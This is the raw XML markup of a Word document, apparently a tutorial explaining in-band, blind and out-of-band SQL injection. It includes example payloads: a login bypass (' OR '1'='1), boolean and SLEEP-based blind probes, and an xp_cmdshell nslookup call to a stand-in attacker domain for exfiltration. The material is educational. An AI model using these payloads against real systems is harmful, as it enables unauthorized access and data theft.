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950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="0060095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600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1. In-band SQL Injection</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 xml:space="preserve">In an </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>in-band SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, the attacker uses the same channel (or medium) to both inject the malicious SQL query and receive the results (data or error messages). This is the most common type of SQL injection attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example:</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Scenario:</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consider a login form where the user provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, and the backend system constructs an SQL query to verify the credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F2FBC" w:rsidRDefault="00600950">
      <w:r w:rsidRPr="00600950">
        <w:t>SELECT * FROM users WHERE username = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00600950">
        <w:t>input_username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00600950">
        <w:t>' AND password = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00600950">
        <w:t>input_password</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00600950">
        <w:t>';</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Malicious Input:</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> An attacker might input the following into the username or password field:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="0060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 xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>' OR '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="0060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Password: (anything)</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This would cause the query to become:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950">
      <w:r w:rsidRPr="00600950">
        <w:t>SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950">
      <w:r>
        <w:t xml:space="preserve">Since </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1='1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is always true, the query will return results for all users in the database, allowing the attacker to bypass authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="00600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The attacker could gain unauthorized access without knowing the actual credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="006009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Data Exfiltration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> In-band SQL injection can also be used to extract sensitive data like usernames, passwords, or other information by appending malicious queries that can return data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>2. Inferential SQL Injection (Blind SQL Injection)</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 xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inferential</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injection (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>blind SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>), the attacker does not directly retrieve data through the application’s response. Instead, they infer the structure of the database or the existence of data based on how the web application behaves after making specific queries.</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 xml:space="preserve">There are two types of </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>blind SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="006009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Boolean-based Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="006009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Time-based Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Example 1: Boolean-based Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suppose a website has a URL like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00D543D8">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00600950" w:rsidRPr="003A526F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/profile?id=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950">
      <w:r>
        <w:t>The application may query the database to retrieve user information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950">
      <w:r w:rsidRPr="00600950">
        <w:t>SELECT * FROM users WHERE id = '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00600950">
        <w:t>input_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00600950">
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Malicious Input:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> An attacker may manipulate the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:r w:rsidRPr="00600950">
        <w:t>id=1' AND 1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950">
      <w:r>
        <w:t xml:space="preserve">This query will return the normal page because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is always true. However, if the attacker modifies the input as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:r w:rsidRPr="00600950">
        <w:t>id=1' AND 1=2 --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950">
      <w:r>
        <w:t xml:space="preserve">The query will return no results, as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is false. Based on the application's behavior (e.g., no user data returned), the attacker can infer that the query is being executed and is working as expected, even though no direct data is returned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example 2: Time-based Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker may use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>time-based techniques</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to deduce information based on the time delay in the server’s response.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Malicious Input:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:r w:rsidRPr="00600950">
        <w:t xml:space="preserve">id=1' AND </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00600950">
        <w:t>IF(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00600950">
        <w:t xml:space="preserve">1=1, SLEEP(5), 0) </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:r>
        <w:t>This would cause the application to wait (sleep) for 5 seconds if the condition is true (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r>
        <w:t>), but return immediately if the condition is false.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="00600950">
      <w:p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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRPr="00600950" w:rsidRDefault="00600950" w:rsidP="006009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0950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If the attacker observes a 5-second delay, they know the condition is true, indicating the server is querying the database correctly. The attacker can then build further queries to </w:t>
      </w:r>
      <w:r w:rsidRPr="00600950">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>infer data about the database structure (e.g., column names, table names, or user information).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Out-of-band SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Out-of-band SQL injection occurs when the attacker uses a different communication channel (or channel outside of the web application’s direct responses) to extract data or perform actions. This type of injection is used when the attacker cannot directly retrieve data from the server (as in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>in-band</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>inferential SQL injection</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:t>Out-of-band attacks rely on the database’s ability to make external requests, such as DNS queries or HTTP requests, to send the data back to the attacker’s server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The attacker injects a query that causes the database to initiate an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>HTTP request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>DNS request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a domain controlled by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00600950" w:rsidRDefault="007B405C" w:rsidP="00600950">
      <w:r>
        <w:t>Malicious Input:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:r w:rsidRPr="007B405C">
        <w:t xml:space="preserve">id=1' OR 1=1; EXEC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B405C">
        <w:t>xp_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B405C">
        <w:t>cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B405C">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B405C">
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B405C">
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B405C">
        <w:t xml:space="preserve"> myattacker.com') --</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRDefault="007B405C" w:rsidP="00600950">
      <w:r>
        <w:t>Here, the SQL query attempts to execute an OS command (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) that performs a DNS lookup (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> myattacker.com</w:t>
      </w:r>
      <w:r>
        <w:t>). If successful, the result of this command is sent to the attacker’s server (either as a DNS request or HTTP request).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B405C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B40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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker can use this method to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B405C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exfiltrate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B405C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> data or confirm the presence of a vulnerability by analyzing the response (such as receiving a DNS lookup or HTTP request from the target server).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B40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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The attacker can then collect information about the server or execute further malicious commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRDefault="007B405C" w:rsidP="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRDefault="00600950" w:rsidP="00600950"/>
    <w:p w:rsidR="00600950" w:rsidRDefault="007B405C" w:rsidP="007B405C">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This method requires the database to have external communication capabilities, like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in SQL Server, and for the target server to be misconfigured to allow external connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B4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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In-band SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="007B405C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most common and allows attackers to easily retrieve data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B4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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Inferential SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="007B405C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> relies on the attacker analyzing application behavior to extract information, often used when in-band access isn’t possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B405C" w:rsidRPr="007B405C" w:rsidRDefault="007B405C" w:rsidP="007B4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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Out-of-band SQL injection</w:t>
      </w:r>
      <w:r w:rsidRPr="007B405C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is less common but highly effective in certain scenarios where the attacker can make the database issue network requests that communicate with external servers they control.</w:t>
      </w:r>
    </w:p>
